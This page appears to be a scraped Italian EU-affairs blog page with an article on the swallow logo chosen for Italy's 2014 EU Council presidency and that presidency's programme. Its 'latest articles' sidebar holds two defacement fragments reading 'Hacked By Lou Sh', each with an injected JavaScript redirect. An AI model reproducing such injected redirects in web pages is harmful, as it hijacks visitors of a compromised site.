EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Aggiungere un commento

E’ una rondine che parla di amicizia, rispetto e futuro il logo ufficiale del Semestre di Presidenza italiana




Dal 1 luglio l’Italia eserciterà la Presidenza del Consiglio dell’Unione europea, a conclusione del semestre gennaio-giugno 2014 guidato dalla Grecia.

E’ la dodicesima volta dal 1958 che l’Italia assolve a questo incarico ma questo semestre sarà particolarmente importante e delicato: durante la Presidenza italiana, infatti, vi sarà innanzitutto l’insediamento della nuova Commissione e la nomina del suo nuovo Presidente, saranno rinnovati gli incarichi di Presidente del Consiglio europeo e l’Alto Rappresentante per la politica estera e la sicurezza comune.

Il governo italiano ha già presentato alla fine del 2013 una prima versione del suo programma ma durante le prossime settimane si metterà a punto la macchina organizzativa del Semestre. Il programma si articolerà nell’ambito di tre grandi blocchi tematici:

Europa della crescita, in cui rientrano le iniziative per l’occupazione giovanile, il completamento del mercato unico, la politica industriale e gli accordi commerciali;

Europa dei cittadini, con il rinnovamento delle istituzioni, lo sviluppo dell’area di sicurezza, libertà, giustizia e la riflessione sul futuro dell’Europa;

Europa nel mondo, in cui rientreranno le iniziative legate ai temi dell’allargamento, del Mediterraneo, dello sviluppo sostenibile, del cambiamento climatico e della sicurezza alimentare.

Lo scorso 20 maggio è stato presentato il logo ufficiale del Semestre di Presidenza italiana, scelto tra i circa 600 progetti elaborati da studenti di ogni età e specializzazione per il concorso “La mia Europa è”. I vari progetti sono stati vagliati da una giuria composta da rappresentanti delle istituzioni coinvolte nel concorso e da due esperte di brand e grafica pubblicitaria.

Il progetto vincitore è quello del Liceo Artistico Design e Tecnico Grafico “Giuseppe Meroni” di Monza. Il logo è una rondine stilizzata con i colori dell’Europa e dell’Italia che, nella descrizione dei ragazzi autori del progetto, è simbolo di amicizia. Nella rondine sono visibili solo i tre elementi più importanti: il becco, che “punta verso l’alto”; le ali, simbolo di orientamento, protezione e rispetto; la coda, che sottolinea le diversità tra tutti noi europei, che pure rimaniamo uniti.

In particolare, tra le motivazioni della scelta, la dott.sa Bellandi, esperta internazionale di brand management, ha apprezzato il parallelo dell’Unione europea come simbolo di libertà a cui rimanda la rondine. La rondine è anche simbolo di primavera e quindi di rinascita, di un nuovo inizio.

“Il becco in su indica che l’Italia, a testa alta, esce dal complesso di Calimero, quello per cui siamo piccoli e sporchi ed è pronta a cogliere tutte le opportunità in Europa – commenta il sottosegretario Sandro Gozi aggiungendo che – La rondine come logo ufficiale del Semestre di Presidenza italiana del Consiglio dell’UE è il simbolo di un’Europa che guarda al futuro”.



Nessun commento
ds Aggiungere un commento

Autori

Sabrina Borriello
Studentessa del corso di laurea magistrale in Scienze dell’informazione, della comunicazione e dell’editoria, Università di Roma Tor Vergata.

Parole chiave



Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015

© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France